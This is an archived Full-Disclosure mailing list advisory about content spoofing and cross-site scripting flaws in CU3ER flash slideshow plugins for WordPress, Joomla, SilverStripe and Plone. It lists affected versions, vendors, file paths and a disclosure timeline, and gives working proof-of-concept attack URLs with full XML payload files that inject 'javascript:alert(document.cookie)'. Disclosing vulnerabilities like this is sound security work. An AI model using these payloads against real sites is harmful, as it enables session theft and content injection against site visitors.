| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 20 Apr 2014 14:11:00 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] Vulnerabilities in plugins with CU3ER for WordPress, Joomla,
SilverStripe and Plone
Hello list!
Recently I disclosed vulnerabilities in CU3ER
(http://seclists.org/fulldisclosure/2014/Apr/244). This is popular flash
file and in Google's index there are up to million web sites with it
(inurl:cu3er.swf filetype:swf - now Google shows 994000 results).
There are any plugins for different CMS with CU3ER. These are Content
Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for
WordPress, Joomla, SilverStripe and Plone. Such plugins as: wpCU3ER for
WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla,
cu3er-silverstripe-extension for SilverStripe, collective.cu3er for Plone.
-------------------------
Affected products:
-------------------------
Vulnerable are all plugins with flash file of CU3ER.
Vulnerable are wpCU3ER 0.75 and previous versions.
Vulnerable are jCU3ER 0.12 and previous versions.
Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous
versions.
Vulnerable are all versions of cu3er-silverstripe-extension.
Vulnerable are collective.cu3er 0.1 and previous versions.
-------------------------
Affected vendors:
-------------------------
MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com
Vinaora
http://code.google.com/p/vinaora-3d-slideshow
Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module
Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1
----------
Details:
----------
Path to flash-file in different plugins:
http://site/wp-content/uploads/wpcu3er/CU3ER.swf
In old versions of the plugin:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf
http://site/components/com_cu3er/flash/CU3ER.swf
http://site/media/mod_vinaora_cu3er/flash/cu3er.swf
http://site/cu3er-silverstripe-extension/flash/cu3er.swf
http://site/collective/cu3er/browser/flash/cu3er.swf
The first two plugins use the last version of CU3ER, and three others use
version 0.9.2 (and also in old versions of wp-cu3er).
Content Spoofing (Content Injection) (WASC-12):
http://site/cu3er.swf?xml=http://site2/1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml=http://site2/xss.xml
File xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
For cross-domain attacks it's needed to have crossdomain.xml at web site
with xml-files.
These are examples of CS and XSS attacks on version CU3ER 0.9.2. For the
last version 1.24 it's needed different xml-files and different parameter is
set to flash-file.
Content Spoofing (WASC-12):
http://site/cu3er.swf?xml_location=http://site2/1.xml
File 1.xml:
<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0"
y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1"
scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1"
scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1"
scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0"
y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0"
y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0"
y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0"
y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>http://websecurity.com.ua</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml_location=http://site2/xss.xml
File xss.xml:
<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0"
y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1"
scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1"
scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1"
scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0"
y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0"
y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0"
y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0"
y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>javascript:alert(document.cookie)</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>
------------
Timeline:
------------
2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers
of the plugins.
2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists